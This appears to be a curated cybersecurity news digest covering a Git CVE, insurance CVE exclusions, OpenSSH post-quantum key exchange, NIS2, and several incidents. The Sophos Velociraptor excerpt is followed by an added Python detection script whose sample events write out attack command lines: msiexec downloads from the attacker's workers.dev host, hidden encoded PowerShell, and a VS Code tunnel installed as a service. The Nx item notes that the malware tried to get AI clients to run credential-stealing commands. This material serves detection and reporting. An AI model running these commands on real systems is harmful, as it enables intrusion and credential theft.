Cyberveille curated by Decio
Root - CVE-2025-48384: Critical Git Vulnerability Actively Exploited https://www.root.io/news-media/cve-2025-48384-critical-git-vulnerability
30/08/2025 23:11:00

Root Security Bulletin - CVE: CVE-2025-48384 Date: August 26, 2025 Severity: High (CVSS v3.1 Score: 8.0)

WhatsApp fixes 'zero-click' bug used to hack Apple users with spyware | TechCrunch https://techcrunch.com/2025/08/29/whatsapp-fixes-zero-click-bug-used-to-hack-apple-users-with-spyware/
30/08/2025 11:00:50

A spyware vendor was behind a recent campaign that abused a vulnerability in WhatsApp to deliver an exploit capable of hacking into iPhones and Macs.

Insurers May Limit Payments in Cases of Unpatched CVEs https://www.darkreading.com/cyber-risk/cyber-insurers-may-limit-payments-breaches-unpatched-cve
29/08/2025 15:05:42

darkreading.com
Robert Lemos, Contributing Writer
August 22, 2025

Some insurers look to limit payouts to companies that don't remediate serious vulnerabilities in a timely manner. Unsurprisingly, most companies don't like those restrictions.

Cyber insurers are testing out new ways to hold policyholders accountable for outdated security, limiting payouts when policyholders fall prey to attacks that use older vulnerabilities or take advantage of holes in the organizations' defenses.

Potential risk-limiting approaches include a sliding scale of accountability — and payouts — based on an unpatched vulnerability's half-life, or whether a company failed to fix a critical vulnerability within a certain number of days, according to a blog post penned by cyber insurer Coalition, which does not support such approaches. Dubbed CVE exclusions, after the Common Vulnerabilities and Exposures (CVE) system widely used to assign identifiers to software security issues, the tactic is not yet widely adopted, and most examples are from insurers outside the US, the firm stated.

The limits could start showing up in companies' policies, however, if demand for cyber insurance continues to grow, creating a seller's market, says John Coletti, head of cyber underwriting at Coalition.

"While we will not name names, there are specific examples of this occurring within the industry," he says. "A company should be highly skeptical of buying a policy with a CVE exclusion."

Cyber-insurance firms are struggling to find different ways to limit their vulnerability to large breaches and campaigns that hit a large number of policyholders. Following NotPetya, when companies used business insurance to cover disruptions to operations, efforts to deny payouts based on warlike-act exclusion clauses largely failed but led to enhanced wording in subsequent policies. Increasingly, cyber-insurance firms used data from policyholders or gleaned from cybersecurity assessments, or information from their own managed security services offerings to better determine risk.

Blame the Victim?
Yet requiring all companies to manage major vulnerabilities is a tall order. Currently, the software industry is on track to disclose more than 46,000 vulnerabilities in 2025, up from nearly 40,000 in 2024, according to the National Vulnerability Database (NVD). Of those, likely 30% would be considered of high or critical severity, typically defined as a Common Vulnerability Scoring System (CVSS) score of 8.0 or higher.

darkreading.com EN 2025 Insurance cyber-insurance Unpatched CVE incident
Google previews cyber ‘disruption unit’ as U.S. government, industry weigh going heavier on offense | CyberScoop https://cyberscoop.com/google-cybersecurity-disruption-unit-active-defense-hack-back/
29/08/2025 14:50:13

cyberscoop.com
By Tim Starks
August 27, 2025

Google says it is starting a cyber “disruption unit,” a development that arrives in a potentially shifting U.S. landscape toward more offensive-oriented approaches in cyberspace.

But the contours of that larger shift are still unclear, and whether or to what extent it’s even possible. While there’s some momentum in policymaking and industry circles to put a greater emphasis on more aggressive strategies and tactics to respond to cyberattacks, there are also major barriers.

Sandra Joyce, vice president of Google Threat Intelligence Group, said at a conference Tuesday that more details of the disruption unit would be forthcoming in future months, but the company was looking for “legal and ethical disruption” options as part of the unit’s work.

“What we’re doing in the Google Threat Intelligence Group is intelligence-led proactive identification of opportunities where we can actually take down some type of campaign or operation,” she said at the Center for Cybersecurity Policy and Law event, where she called for partners in the project. “We have to get from a reactive position to a proactive one … if we’re going to make a difference right now.”

The boundaries in the cyber domain between actions considered “cyber offense” and those meant to deter cyberattacks are often unclear. The tradeoff between “active defense” vs. “hacking back” is a common dividing line. On the less aggressive end, “active defense” can include tactics like setting up honeypots designed to lure and trick attackers. At the more extreme end, “hacking back” would typically involve actions that attempt to deliberately destroy an attacker’s systems or networks. Disruption operations might fall between the two, like Microsoft taking down botnet infrastructure in court or the Justice Department seizing stolen cryptocurrency from hackers.

Trump administration officials and some in Congress have been advocating for the U.S. government to go on offense in cyberspace, saying that foreign hackers and criminals aren’t suffering sufficient consequences. Much-criticized legislation to authorize private sector “hacking back” has long stalled in Congress, but some have recently pushed a version of the idea where the president would give “letters of marque” like those for early-U.S. sea privateers to companies authorizing them to legally conduct offensive cyber operations currently forbidden under U.S. law.

The private sector has some catching up to do if there’s to be a worthy field of firms able to focus on offense, experts say.

John Keefe, a former National Security Council official from 2022 to 2024 and National Security Agency official before that, said there had been government talks about a “narrow” letters of marque approach “with the private sector companies that we thought had the capabilities.” The concept was centered on ransomware, Russia and rules of the road for those companies to operate. “It wasn’t going to be the Wild West,” said Keefe, now founder of Ex Astris Scientia, speaking like others in this story at Tuesday’s conference.

The companies with an emphasis on offense largely have only one customer — and that’s governments, said Joe McCaffrey, chief information security officer at defense tech company Anduril Industries. “It’s a really tough business to be in,” he said. “If you develop an exploit, you get to sell to one person legally, and then it gets burned, and you’re back again.”

By their nature, offensive cyber operations in the federal government are already very time- and manpower-intensive, said Brandon Wales, a former top official at the Cybersecurity and Infrastructure Security Agency and now vice president of cybersecurity at SentinelOne. Private sector companies could make their mark by innovating ways to speed up and expand the number of those operations, he said.

Overall, among the options of companies that could do more offensive work, the “industry doesn’t exist yet, but I think it’s coming,” said Andrew McClure, managing director at Forgepoint Capital.

Certainly Congress would have to clarify what companies are able to do legally as well, Wales said.

But that’s just the industry side. There’s plenty more to weigh when stepping up offense.

“However we start, we need to make sure that we are having the ability to measure impact,” said Megan Stifel, chief strategy officer for the Institute for Security and Technology. “Is this working? How do we know?”

If there was a consensus at the conference it’s that the United States — be it the government or private sector — needs to do more to deter adversaries in cyberspace by going after them more in cyberspace.

One knock on that idea has been that the United States can least afford to get into a cyber shooting match, since it’s more reliant on tech than other nations and an escalation would hurt the U.S. the most by presenting more vulnerable targets for enemies. But Dmitri Alperovitch, chairman of the Silverado Policy Accelerator, said that idea was wrong for a couple reasons, among them that other nations have become just as reliant on tech, too.

And “the very idea that in this current bleak state of affairs, engaging in cyber offense is escalatory, I propose to you, is laughable,” he said. “After all, what are our adversaries going to escalate to in response? Ransom more of our hospitals, penetrate more of our water and electric utilities, steal even more of our IP and financial assets?”

Alperovitch continued: “Not only is engaging in thoughtful and careful cyber offense not escalatory, but not doing so is.”

cyberscoop.com EN 2025 Google disruption-unit US
Velociraptor incident response tool abused for remote access https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/
29/08/2025 14:36:00

news.sophos.com Written by Sophos Counter Threat Unit Research Team
August 26, 2025
This approach represents an evolution from threat actors abusing remote monitoring and management tools

In August 2025, Counter Threat Unit™ (CTU) researchers investigated an intrusion that involved deployment of the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool. In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server. Enabling the tunnel option in Visual Studio Code triggered a Taegis™ alert, as this option can allow both remote access and remote code execution and has been abused by multiple threat groups in the past.

The threat actor used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain (files[.]qaubctgg[.]workers[.]dev). This location appears to be a staging folder for attacker tools, including the Cloudflare tunneling tool and the Radmin remote administration tool. This file installed Velociraptor, which is configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev. The attacker then used an encoded PowerShell command to download Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled. The threat actor installed code.exe as a service and redirected the output to a log file. They then used the msiexec Windows utility again to download additional malware (sc.msi) from the workers[.]dev folder (see Figure 1).

Figure 1: Process tree showing Velociraptor creating Visual Studio Code tunnel.

The Visual Studio Code tunneling activity triggered a Taegis alert that prompted a Sophos investigation. The analysts provided mitigation advice that enabled the customer to quickly implement remediations such as isolating the affected host, which prevented the attacker from achieving their objectives. Analysis suggests that the malicious activity would likely have led to ransomware deployment.

Threat actors often abuse remote monitoring and management (RMM) tools. In some instances, they leverage preexisting tools on the targeted systems. In others, they deploy the tools during the attack. The Velociraptor incident reveals attackers pivoting to using incident response tools to gain a foothold in a network and minimize the amount of malware they deploy.

Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware. Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviors, and following best practices for securing systems and generating backups can mitigate the ransomware threat. The impact of an attack is greatly reduced if it is caught prior to ransomware deployment.

The following Sophos protections detect activity related to this threat:

Troj/Agent-BLMR
Troj/BatDl-PL
Troj/Mdrop-KDK
To mitigate exposure to this malware, CTU™ researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. The domains may contain malicious content, so consider the risks before opening them in a browser.

Indicator Type Context
files[.]qaubctgg[.]workers[.]dev Domain name Hosted tools used in August 2025 Velociraptor campaign
velo[.]qaubctgg[.]workers[.]dev Domain name C2 server used in August 2025 Velociraptor campaign
Table 1: Indicators for this threat.
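As an added defender-side example (not Sophos or CTU code), the following Python tags constructed Windows process-creation events for the stages described above (msiexec fetching an installer from a workers.dev URL, Velociraptor spawning an encoded PowerShell command, code.exe started as a service with the tunnel option) and correlates them per host. The field names, the approved-host logic and the sample telemetry are assumptions modelled on the report, not real logs.

```python
"""Detection logic for the Velociraptor -> VS Code tunnel tradecraft.

Added example, not Sophos/CTU code. Events are shaped like Sysmon Event ID 1
or EDR process-creation telemetry; the field names (ts, host, image,
parent_image, command_line) are an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
MSIEXEC_REMOTE = re.compile(r"\s/i\s+https?://", re.I)            # msiexec /i <URL>
WORKERS_DEV_URL = re.compile(r"https?://[^\s/]+\.workers\.dev\b", re.I)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
VSCODE_TUNNEL = re.compile(r"(^|\s)tunnel(\s|$)", re.I)           # "code.exe tunnel ..."

# Constructed telemetry mirroring the reported chain (WS01) and benign activity (WS02).
# The workers.dev hostnames are the indicators from Table 1; the base64 blob is a placeholder.
SAMPLE_EVENTS = [
    {"ts": "2025-08-20T10:00:00", "host": "WS01",
     "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "msiexec /i https://files.qaubctgg.workers.dev/v2.msi /qn"},
    {"ts": "2025-08-20T10:01:30", "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "command_line": "powershell.exe -nop -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"ts": "2025-08-20T10:03:00", "host": "WS01",
     "image": r"C:\Users\Public\code.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r'"C:\Users\Public\code.exe" tunnel --accept-server-license-terms'},
    {"ts": "2025-08-20T10:05:00", "host": "WS01",
     "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "msiexec /i https://files.qaubctgg.workers.dev/sc.msi /qn"},
    {"ts": "2025-08-20T10:02:00", "host": "WS02",
     "image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"msiexec /i \\fileshare\apps\7zip.msi /qn"},
    {"ts": "2025-08-20T10:04:00", "host": "WS02",
     "image": r"C:\Program Files\Microsoft VS Code\Code.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\src\project'},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def tag_event(ev: dict) -> set[str]:
    """Return the detection tags a single process-creation event satisfies."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["command_line"]
    tags = set()
    if img == "msiexec.exe" and MSIEXEC_REMOTE.search(cmd):
        tags.add("msiexec_remote_install")            # installer pulled straight from a URL
    if WORKERS_DEV_URL.search(cmd):
        tags.add("workers_dev_url")                   # staging folder pattern from the report
    if parent == "velociraptor.exe" and img in SHELLS:
        tags.add("velociraptor_spawned_shell")        # DFIR tool used to run commands
    if img in SHELLS and ENCODED_PS.search(cmd):
        tags.add("encoded_powershell")
    if img == "code.exe" and VSCODE_TUNNEL.search(cmd):
        tags.add("vscode_tunnel")                     # remote access / RCE via VS Code tunnel
        if parent == "services.exe":
            tags.add("vscode_tunnel_as_service")      # persistence: tunnel installed as a service
    return tags


def correlate(events: list, window: timedelta = timedelta(minutes=30)) -> dict:
    """Collect tags per host inside a time window; three or more distinct stages
    on one host is treated as a ransomware precursor that warrants isolation."""
    per_host = defaultdict(list)
    for ev in events:
        tags = tag_event(ev)
        if tags:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), tags))
    verdicts = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        start = hits[0][0]
        stages = set().union(*(t for ts, t in hits if ts - start <= window))
        verdicts[host] = {
            "stages": stages,
            "verdict": "isolate_and_investigate" if len(stages) >= 3 else "review",
        }
    return verdicts


if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(host, result["verdict"], sorted(result["stages"]))
```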

sophos.com EN 2025 Velociraptor abused
OpenSSH: Post-Quantum Cryptography https://www.openssh.com/pq.html
29/08/2025 12:12:45

openssh.com - OpenSSH supports a number of cryptographic key agreement algorithms considered to be safe against attacks from quantum computers. We recommend that all SSH connections use these algorithms.

OpenSSH has offered post-quantum key agreement (KexAlgorithms) by default since release 9.0 (April 2022), initially via the sntrup761x25519-sha512 algorithm. More recently, in OpenSSH 9.9, we have added a second post-quantum key agreement mlkem768x25519-sha256 and it was made the new default scheme in OpenSSH 10.0 (April 2025).

To encourage migration to these stronger algorithms, OpenSSH 10.1 will warn the user when a non post-quantum key agreement scheme is selected, with the following message:

WARNING: connection is not using a post-quantum key exchange algorithm.
This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
This warning is displayed by default but may be disabled via the WarnWeakCrypto option in ssh_config(5).

Background
A quantum computer (QC) is a device capable of performing computations with information encoded as quantum states. Such a device could quickly solve particular problems that are intractable for existing "classical" computers.

The mathematics that underpin a number of cryptographic algorithms are among the problems that quantum computers are believed to be able to effectively solve. This means that a sufficiently powerful quantum computer (a.k.a. a "cryptographically-relevant" quantum computer) will be able to break them. Most affected is the cryptography used for key agreement and digital signatures, both of which play important roles in SSH.

Fortunately, quantum computers of sufficient power to break cryptography have not been invented yet. Estimates for when a cryptographically-relevant quantum computer will arrive, based on the rate of progress in the field, range from 5-20 years, with many observers expecting them to arrive in the mid-2030s.

The entire privacy of an SSH connection depends on cryptographic key agreement. If an attacker can break the key agreement then they are able to decrypt and view the entire session. The attacker need not perform this attack in real time; they may collect encrypted SSH sessions now and then decrypt them later once they have access to a quantum computer. This is referred to as a "store now, decrypt later" attack (also as "harvest now, decrypt later").

Fortunately, improved "post-quantum" cryptographic algorithms have been devised that rely on different underlying mathematical problems that are understood to not be attackable by a quantum computer.

OpenSSH has supported post-quantum key agreement to prevent "store now, decrypt later" attacks for several years and it has been the default since OpenSSH-9.0, released in 2022.

FAQ
I received a warning from ssh that directed me to this page. What should I do?
As mentioned above, OpenSSH 10.1 started warning users when connections use cryptography that is not safe against quantum computers. If you received such a warning, it means that the server you connected to did not offer one of the two post-quantum key agreement algorithms that are being standardised for the SSH protocol: mlkem768x25519-sha256 and sntrup761x25519-sha512.

The ideal solution is to update the server to use an SSH implementation that supports at least one of these. OpenSSH versions 9.0 and greater support sntrup761x25519-sha512 and versions 9.9 and greater support mlkem768x25519-sha256. If your server is already running one of these versions, then check whether the KexAlgorithms option has disabled their use.

If you are unable to update the server and/or you prefer to accept the risk of continuing to use quantum-unsafe cryptography then the warning may be silenced via the WarnWeakCrypto option in ssh_config(5). We recommend doing this selectively, for example:
Match host unsafe.example.com
    WarnWeakCrypto no

Quantum computers don't exist yet, why go to all this trouble?
Because of the "store now, decrypt later" attack mentioned above. Traffic sent today is at risk of decryption unless post-quantum key agreement is used.

What about signature algorithms? You said they were at risk too
Yes, most currently-used signature algorithms (including RSA and ECDSA) can be broken by a quantum computer. However, there is no risk to existing traffic in this situation (i.e. there is no analogous "store now, decrypt later"). The only urgency for signature algorithms is ensuring that all classical signature keys are retired in advance of cryptographically-relevant computers becoming a reality. OpenSSH will add support for post-quantum signature algorithms in the future.

I don't believe we'll ever get quantum computers. This is a waste of time
Some people consider the task of scaling existing quantum computers up to the point where they can tackle cryptographic problems to be practically insurmountable. This is a possibility. However, it appears that most of the barriers to a cryptographically-relevant quantum computer are engineering challenges rather than underlying physics.

If we're right about quantum computers being practical, then we will have protected vast quantities of user data. If we're wrong about it, then all we'll have done is moved to cryptographic algorithms with stronger mathematical underpinnings.

These post-quantum algorithms are new. Are we sure they aren't broken?
We're wary of this too. Though post-quantum key agreement algorithms have received a lot of concerted cryptographic attention over the last few years, it's possible that new attacks might be found.

To defend against this happening we have selected post-quantum algorithms with good safety margins. This means that even if they turn out to be weaker than expected they are still likely to be strong enough to be considered fit for purpose.

Additionally, all the post-quantum algorithms implemented by OpenSSH are "hybrids" that combine a post-quantum algorithm with a classical algorithm. For example mlkem768x25519-sha256 combines ML-KEM, a post-quantum key agreement scheme, with ECDH/x25519, a classical key agreement algorithm that was formerly OpenSSH's preferred default. This ensures that the combined, hybrid algorithm is no worse than the previous best classical algorithm, even if the post-quantum algorithm turns out to be completely broken by future cryptanalysis.

OpenSSH EN 2025 Post-Quantum Cryptography SSH
I am a Swiss company. Am I affected by NIS2? https://incyber.org/article/je-suis-une-entreprise-suisse-suis-je-concernee-par-nis2/
29/08/2025 11:57:20

incyber.org Marie De Freminville
26.08.25

The NIS2 Directive (Network and Information Security 2), adopted by the European Union, had to be transposed into national law by each EU Member State by October 2024 at the latest, with transposition processes and timelines specific to each country.
Given the increase in cyber threats, it imposes stricter standards for cybersecurity, risk management and incident response than the NIS Directive of 2016.
This new directive broadens both the expectations and the scope. It aims to anticipate new forms of attack, to move from a reactive approach to a proactive strategy, and to establish extensive collaboration across the whole ecosystem in order to ensure the resilience of critical infrastructure.

Its scope is broader and extends to entities considered essential or important (e.g. energy, transport, health, digital infrastructure, public administration, etc.). For more details, see https://monespacenis2.cyber.gouv.fr/directive/.

NIS2 is not directly applicable in Switzerland. Nevertheless, a Swiss company is affected, notably if it is part of the critical supply chain of European Union companies subject to NIS2: for example as a provider of digital services or of cross-border critical infrastructure, or if it operates within the European Union through a subsidiary that falls within the scope of NIS2 (the scope mentioned above).

Beyond strict compliance, adherence to European standards in the digital domain is a pillar of trust between Swiss companies and their European partners or customers, and applying these standards will strengthen the security of the Swiss entities that comply with them.

The main questions to ask:

Does my company have a subsidiary, branch or legal entity in an EU country?
Does my company provide services to customers located in the EU (companies, governments, critical infrastructure)?
Does my company host, process or transport data of European citizens?
Does my company operate in an "essential" sector (energy, health, banking, transport, digital infrastructure, water, space, public administration) or an "important" sector (agri-food, digital services, research, chemicals, waste, critical manufacturing)?
If the Swiss company meets any of these criteria, or if the contract binding it to its customer contains NIS2 compliance obligations, it must ensure that its cybersecurity arrangements include in particular:

A clearly identified CISO or cybersecurity officer,
A formal cybersecurity policy, approved by management,
An incident management procedure (notification within 24 hours),
Regular risk analyses, audits and tests to verify the robustness of the arrangements,
Cybersecurity training for administrators and executives.
In the financial sector, banking institutions with a subsidiary or branch in the EU, or acting as a subcontractor or partner of European banks or market players, will have to put in place:

Cybersecurity governance at board level: appoint a cybersecurity officer (CISO) at executive level, revise the cybersecurity strategy, and set up an IT security committee.
A mapping and management of information-system security risks: identify the assets essential to the bank's operation, including the supply chain, IT suppliers and interconnections.
Incident notification procedures with very short deadlines (24 hours), and a cyber incident response plan.
Compliance audits, and a dashboard (tracking security indicators and NIS2 requirements).
Verification of the cybersecurity maturity of providers of digital banking, IT, cloud and other services, i.e. requiring them to comply with NIS2 standards.
An awareness and training programme for employees, executives and the board of directors.
An update of contracts with IT suppliers, and verification of subcontractors' security levels.
The banking sector is already heavily regulated: FINMA (the Swiss financial market supervisory authority) imposes strict requirements through its circulars, such as 2018/3 « Outsourcing » and 2023/1 « Gestion des risques informatiques » (IT risk management), based on risk and proportionality.

The initiatives of the Confederation (NCSC) are also part of a move toward alignment with European standards.

Other essential entities in the financial sector are the FMIs (Financial Market Infrastructures): trading venues (stock exchanges, MTFs (Multi Trading Facilities), OTFs (Organised Trading Facilities), quotation systems), clearing houses (CCPs), central securities depositories (CSDs), settlement systems, providers of critical benchmarks, and regulated market data operators.

In Switzerland, these entities include players such as SIX Group, SIX x-clear, SIX SIS and Swiss Interbank Clearing (SIC), which operate critical national systems that are also interconnected with the EU.

Although Switzerland is not directly subject to NIS2, its FMIs operate internationally, in particular in the EU, and process critical financial data that is often shared with European counterparties.

Although they are already subject to rigorous regulations, such as the LFIN, the LBVM, the Financial Market Infrastructure Regulation, FINMA guidelines, the ISO 27001/22301 standards, etc., Swiss FMIs will have to demonstrate equivalent compliance with NIS2 requirements, even if only contractually or operationally.

In the health sector, hospitals and clinics, laboratories, critical care providers, medical technology companies (eHealth, MedTech, telemedicine) and IT providers (health cloud, electronic patient records (DMP), medical data platforms) that work with the EU are considered essential entities (Annex I of NIS2).

As in the banking industry, companies in this sector have new obligations and must be able to produce the following documents:

Health cybersecurity policy (with NIS2 requirements),
IT / DMP / IoMT risk analysis,
Incident notification procedure,
Compliance register / dashboard,
Audit reports / remediation plans,
Awareness / training certificates.
In the energy sector, network operators, producers, suppliers and technical service providers (e.g. SCADA: industrial supervisory control systems, OT: operational technology, industrial cloud) must comply with NIS2, insofar as they must meet the expectations of European partners and European authorities, with the objective of strengthening the resilience of critical infrastructure.

Furthermore, companies in this sector must anticipate the evolution of Swiss law (LSI, OICN, etc.), which must converge with NIS2, through the Ordinance on the Protection of Critical Infrastructure (OICN) and the directives of the SFOE (OFEN) and the NCSC.

The specific features of the energy sector are as follows:

Include OT, production, suppliers and remote management in the security policy,
Create an interdisciplinary cybersecurity committee with representatives from IT, OT, operations and compliance,
Map critical systems: automated supervision, distributed control, distribution networks, high-voltage substations, infrastructure shared with the EU,
Strengthen security measures on industrial IT systems (notably separation of environments and access control), detect incidents, put in place a business continuity / recovery plan, and review IT supplier contracts with a NIS2 compliance clause,
Train administrators and executives, but also industrial and IT operators.
In the transport sector, the NIS2 Directive covers all forms of critical transport: air (airlines, airport operators, air traffic control), rail (railway operators, infrastructure managers, signalling services), maritime (ports, shipping companies, navigation systems, freight operators) and road (motorway companies, traffic management, essential logistics platforms; lower priority but possible depending on the Member State).

Switzerland, being closely interconnected with European networks, is a party to cross-border agreements (e.g. European rail transport, aviation safety with EASA, logistics corridors). It is subject to its own cybersecurity frameworks (e.g. OICN, LSI, requirements of the Federal Office of Transport (OFT)), and its transport companies are therefore strongly encouraged to align voluntarily with NIS2, and in particular to secure industrial systems (isolation, network segmentation, SCADA monitoring) and to identify the systems interconnected with the EU.

Finally, Swiss digital infrastructures are closely interconnected with those of the EU (Internet interconnection, IP transit, European clouds, cross-border networks) and are likely to host or transport European data (in the case of cloud players or global digital service providers).

They are subject to the Information Security Act (LSI), the Telecommunications Act (LTC), and the recommendations of the NCSC and SERI (SEFRI), which are a central pillar of the NIS2 Directive.

Swiss digital infrastructure providers (DNS service providers, domain name registries, critical cloud services, critical data centres, content delivery networks, Internet exchange points) operating in Europe or serving European customers must demonstrate a level of security equivalent to that required by NIS2, often through audits, certifications or contractual clauses.

They must therefore map the customers and services exposed to the EU, strengthen detection, resilience and monitoring, define clear procedures, audits and documentation, and check their subcontractors and their compliance with NIS2 (a clause to be added to their contracts).

In conclusion, although Switzerland imposes cyber-risk regulations on its companies, the expectations and the scope are not exactly the same as in the NIS2 Directive.

It is therefore important for Swiss companies that fall within the scope of NIS2 and operate with the EU to determine what actions to take to strengthen their cybersecurity arrangements, which are essential to maintain relationships of trust with customers and partners and to meet their regulatory requirements.

incyber.org FR 2025 NIS2 EU Suisse PME legal droit
ENISA receives 36 million euros to strengthen cyber crisis response https://www.usine-digitale.fr/article/l-enisa-recoit-36-millions-d-euros-pour-renforcer-la-reponse-aux-crises-cyber.N2236611
29/08/2025 11:55:02

www.usine-digitale.fr Alice Vitard
26 August 2025

Under the Cyber Solidarity Act, the European Union Agency for Cybersecurity has been entrusted with managing the European cybersecurity reserve. With a budget of 36 million euros, it is responsible for selecting and coordinating providers capable of intervening in large-scale incidents.

The European Commission and the European Union Agency for Cybersecurity (ENISA) announced on 26 August that they had signed a contribution agreement entrusting ENISA with the administration and operation of the European cybersecurity reserve. A budget of 36 million euros over three years has been allocated to it.

Responding to large-scale incidents
This reserve is provided for in Article 14 of the Cyber Solidarity Act, a text adopted in 2024 to give the Union stronger means to detect, prepare for and respond to large-scale cyberattacks. It is intended to give the EU shared capabilities for responding to major incidents.

In practice, the reserve is designed as a support mechanism that can be mobilised in the event of a significant cross-border incident. It relies on a network of trusted managed service providers, pre-selected through public tenders. These providers can step in to contain an attack, ensure continuity of service or support recovery after an incident.

Note that the scheme includes a flexibility clause: if the pre-committed services are not used for incident response, they can be converted into preparedness services (security testing, crisis exercises and resilience audits).

The reserve open to a range of actors
Specifically, the reserve will be open to the critical sectors defined by the NIS 2 directive and to EU institutions, agencies and bodies. Under certain conditions, third countries associated with the Digital Europe programme will also be able to access it.

ENISA is given four tasks: launching and managing the public procurement to select providers, assessing requests for assistance from Member States, forwarding requests from third countries to the European Commission for approval, and monitoring and checking the delivery of the services provided by the providers.

The contribution agreement provides for funding of 36 million euros over three years. These funds come on top of the annual budget of 26.9 million euros. They are aligned with the period during which the services are made available. Their use is overseen by the European executive.

Filling the gap in coordinated response
By pooling resources, the European reserve aims to fill a long-standing gap: the absence of a coordinated response capability for large-scale attacks. In this context, the Cyber Solidarity Act also provides for the deployment of cross-border SOCs and for dedicated European funding to support Member States in building up their IT security capacity.

usine-digitale.fr FR ENISA CyberSolidarityAct EU
Hundreds of Swedish municipalities impacted by suspected ransomware attack on IT supplier https://therecord.media/sweden-municipalities-ransomware-software
29/08/2025 11:45:01

therecord.media Alexander Martin
August 27th, 2025

A suspected ransomware attack on a Swedish software provider is believed to have impacted around 200 of the country’s municipal governments.

A suspected ransomware attack on Miljödata, a Swedish software provider used for managing sick leave and similar HR reports, is believed to have impacted around 200 of the country’s municipal governments.

The attack was detected on Saturday, according to the company’s chief executive Erik Hallén. The attackers are attempting to extort Miljödata, police told local newspaper BLT.

Swedish Minister for Civil Defence Carl-Oskar Bohlin wrote in a short update on social media: “The scope of the incident has not yet been clarified, and it is too early to determine the actual consequences.”

Hallén told Swedish press agency TT that around 200 municipalities and regions were affected by the incident. Sweden has 290 municipalities and 21 regions.

Several regional governments have confirmed using Miljödata systems to handle employee data, including “for example, medical certificates, rehabilitation plans, work-related injuries, and more,” according to the local government of the island of Gotland.

Hallén reportedly said Miljödata was “working very intensively with external experts to investigate what happened, what and who was affected, and to restore system functionality.”

“The government is receiving ongoing information about the incident and is in close contact with the relevant authorities,” Bohlin, the civil defense minister, said.

“CERT-SE, which has the task of supporting Swedish society in handling and preventing IT security incidents, has offered advice and support to both the company in question and the affected customers,” the minister added. “The national cybersecurity center is coordinating the measures of the relevant authorities. A police investigation is also underway.”

He stressed the incident underscored the need for high levels of cybersecurity throughout society, and said the Swedish government planned to present a new cybersecurity bill to the Swedish parliament in the near future “that will impose increased requirements on a wide range of actors.”

therecord.media EN 2025 Miljödata Sweden ransomware municipalities
Thousands of Developer Credentials Stolen in macOS “s1ngularity” Attack https://hackread.com/developer-credentials-stolen-macos-s1ngularity-attack/
29/08/2025 11:40:42

https://hackread.com
by
Deeba Ahmed
August 28, 2025

A supply chain attack called “s1ngularity” on Nx versions 20.9.0-21.8.0 stole thousands of macOS developer credentials with the help of AI tools.

A sophisticated cyberattack, dubbed the “s1ngularity” attack, has compromised Nx, a popular build platform widely used by software developers. The attack, which began on August 26, 2025, is a supply chain attack, a type of security breach where hackers sneak malicious code into a widely used piece of software, which then infects all the people who use it.

The attack was designed to steal a wide variety of sensitive data, including GitHub tokens, npm authentication keys, and SSH private keys. These credentials are essentially digital keys that provide access to a user’s accounts and systems.

The malicious software also went a step further, targeting API keys for popular AI tools like Gemini, Claude, and Q, demonstrating a new focus on emerging technologies. In addition to stealing data, the attackers installed a destructive payload that modified users’ terminal startup files, causing their terminal sessions to crash.

GitGuardian’s analysis shared with Hackread.com revealed some surprising details about the attack and its victims. The firm found that 85% of the infected systems were running macOS, highlighting the attack’s particular impact on the developer community, which frequently uses Apple computers.

In a curious turn, GitGuardian found that of the hundreds of systems where AI tools were targeted, many of the AI clients unexpectedly resisted the malicious requests. They either outright refused to run the commands or gave responses suggesting they knew they were being asked to do something wrong, showing a potential, though unintentional, new layer of security.

The stolen credentials were not only valuable but also widespread. GitGuardian’s monitoring platform, which tracks public GitHub activity, discovered 1,346 repositories used by the attackers to store stolen data.

To avoid detection, the attackers double-encoded the stolen data before uploading it. This number is far higher than the ten publicly visible repositories, as GitHub was quickly working to delete the rest. An analysis of these repositories revealed 2,349 distinct secrets, with over 1,000 still valid and working at the time of the report. The most common secrets were for GitHub and popular AI platforms.

For anyone who used the malicious Nx versions 20.9.0 through 21.8.0, the most crucial step is to immediately assume that their credentials have been exposed. GitGuardian has created a free service called HasMySecretLeaked that allows developers to check for compromised credentials without ever revealing their actual keys.

This attack reminds us that simply deleting a compromised file is not enough; the actual secret keys and tokens must be revoked and rotated to prevent further access by the attackers.

hackread.com EN 2025 Nx Supply-Chain-Attack npm s1ngularity
Swiss hospitals join forces against cyber-attacks - SWI swissinfo.ch https://www.swissinfo.ch/eng/various/18-hospital-entities-together-against-cyber-attacks/89911584
29/08/2025 08:47:21

www.swissinfo.ch August 28, 2025 -
